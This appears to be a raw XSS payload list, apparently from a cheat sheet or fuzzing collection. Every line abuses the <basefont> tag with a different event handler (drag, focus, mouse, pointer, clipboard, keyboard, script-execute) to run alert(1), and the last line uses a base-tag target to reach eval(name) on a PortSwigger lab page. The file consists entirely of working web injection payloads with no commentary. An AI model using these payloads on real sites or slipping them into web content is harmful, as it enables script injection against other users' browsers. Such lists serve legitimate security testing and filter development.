basefont.txt

<basefont draggable="true" ondrag="alert(1)">test</basefont>
<basefont draggable="true" ondragend="alert(1)">test</basefont>
<basefont draggable="true" ondragenter="alert(1)">test</basefont>
<basefont draggable="true" ondragleave="alert(1)">test</basefont>
<basefont draggable="true" ondragstart="alert(1)">test</basefont>
<basefont id=x tabindex=1 onactivate=alert(1)></basefont>
<basefont id=x tabindex=1 onbeforeactivate=alert(1)></basefont>
<basefont id=x tabindex=1 onbeforedeactivate=alert(1)></basefont><input autofocus>
<basefont id=x tabindex=1 ondeactivate=alert(1)></basefont><input id=y autofocus>
<basefont id=x tabindex=1 onfocus=alert(1)></basefont>
<basefont id=x tabindex=1 onfocusin=alert(1)></basefont>
<basefont onafterscriptexecute=alert(1)><script>1</script>
<basefont onbeforecopy="alert(1)" contenteditable>test</basefont>
<basefont onbeforecut="alert(1)" contenteditable>test</basefont>
<basefont onbeforepaste="alert(1)" contenteditable>test</basefont>
<basefont onbeforescriptexecute=alert(1)><script>1</script>
<basefont onblur=alert(1) tabindex=1 id=x></basefont><input autofocus>
<basefont onclick="alert(1)">test</basefont>
<basefont oncontextmenu="alert(1)">test</basefont>
<basefont oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<basefont oncut=alert(1) value="XSS" autofocus tabindex=1>test
<basefont ondblclick="alert(1)" autofocus tabindex=1>test</basefont>
<basefont onfocusout=alert(1) tabindex=1 id=x></basefont><input autofocus>
<basefont onkeydown="alert(1)" contenteditable>test</basefont>
<basefont onkeypress="alert(1)" contenteditable>test</basefont>
<basefont onkeyup="alert(1)" contenteditable>test</basefont>
<basefont onmousedown="alert(1)">test</basefont>
<basefont onmouseenter="alert(1)">test</basefont>
<basefont onmouseleave="alert(1)">test</basefont>
<basefont onmousemove="alert(1)">test</basefont>
<basefont onmouseout="alert(1)">test</basefont>
<basefont onmouseover="alert(1)">test</basefont>
<basefont onmouseup="alert(1)">test</basefont>
<basefont onmousewheel=alert(1)>requires scrolling
<basefont onpaste="alert(1)" contenteditable>test</basefont>
<basefont onpointerdown=alert(1)>XSS</basefont>
<basefont onpointerenter=alert(1)>XSS</basefont>
<basefont onpointerleave=alert(1)>XSS</basefont>
<basefont onpointermove=alert(1)>XSS</basefont>
<basefont onpointerout=alert(1)>XSS</basefont>
<basefont onpointerover=alert(1)>XSS</basefont>
<basefont onpointerrawupdate=alert(1)>XSS</basefont>
<basefont onpointerup=alert(1)>XSS</basefont>
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>